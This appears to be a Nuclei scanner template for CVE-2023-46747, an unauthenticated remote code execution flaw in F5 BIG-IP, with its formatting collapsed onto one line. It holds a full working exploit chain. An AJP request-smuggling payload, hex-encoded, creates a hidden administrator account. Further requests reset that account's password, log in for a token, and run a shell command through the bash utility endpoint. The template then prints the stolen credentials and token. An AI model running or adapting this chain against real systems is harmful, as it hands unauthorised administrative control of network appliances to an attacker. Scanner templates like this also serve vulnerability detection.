F5 BIG-IP RCE（CVE-2023-46747）

id: F5-BIG-IP-CVE-2023-46747-Unauthenticated-AJP-RCEinfo:  name: F5-BIG-IP-CVE-2023-46747-Unauthenticated-AJP-RCE  author: xxxx  severity: critical  description:  F5 BIG-IP CVE-2023-46747   tags: f5,bigipvariables:  username: "{{hex_encode(rand_base(5))}}"  password: "{{hex_encode(rand_base(12))}}"  password2: "{{rand_base(14)}}"http:  - raw:      - |+        POST /tmui/login.jsp HTTP/1.1        Host: {{Hostname}}        Transfer-Encoding: chunked, chunked        Content-Type: application/x-www-form-urlencoded        204        {{ hex_decode(concat("0008485454502f312e310000122f746d75692f436f6e74726f6c2f666f726d0000093132372e302e302e310000096c6f63616c686f73740000096c6f63616c686f7374000050000003000b546d75692d44756262756600000b424242424242424242424200000a52454d4f5445524f4c450000013000a00b00096c6f63616c686f73740003000561646d696e000501715f74696d656e6f773d61265f74696d656e6f775f6265666f72653d2668616e646c65723d253266746d756925326673797374656d25326675736572253266637265617465262626666f726d5f706167653d253266746d756925326673797374656d253266757365722532666372656174652e6a737025336626666f726d5f706167655f6265666f72653d26686964654f626a4c6973743d265f62756676616c75653d65494c3452556e537758596f5055494f47634f4678326f30305863253364265f62756676616c75655f6265666f72653d2673797374656d757365722d68696464656e3d5b5b2241646d696e6973747261746f72222c225b416c6c5d225d5d2673797374656d757365722d68696464656e5f6265666f72653d266e616d653d",username,"266e616d655f6265666f72653d267061737377643d",password,"267061737377645f6265666f72653d2666696e69736865643d782666696e69736865645f6265666f72653d00ff00")) }}        0    unsafe: true  - raw:      - |+        PATCH /mgmt/tm/auth/user/{{hex_decode(username)}} HTTP/1.1        Host: {{Hostname}}        Authorization: Basic {{base64(hex_decode(username)+":"+hex_decode(password))}}        Content-Type: application/json        {"password": "{{password2}}"}      - |+        POST /mgmt/shared/authn/login HTTP/1.1        Host: {{Hostname}}        Content-Type: application/json        {"username":"{{hex_decode(username)}}", "password":"{{password2}}"}      - |+        POST /mgmt/tm/util/bash HTTP/1.1        Host: {{Hostname}}        X-F5-Auth-Token: {{token}}        Content-Type: application/json        {"command":"run","utilCmdArgs":"-c id"}    extractors:      - type: regex        part: body_2        name: token        group: 1        regex:          - "([A-Z0-9]{26})"        internal: true      - type: regex        part: body_3        group: 1        regex:          - ""commandResult":"(.*)""      - type: dsl        dsl:          - '"Username:" + hex_decode(username)'          - '"Password:" + password2'          - '"Token:" + token'    matchers:      - type: word        words:          - "commandResult"          - "uid="        condition: and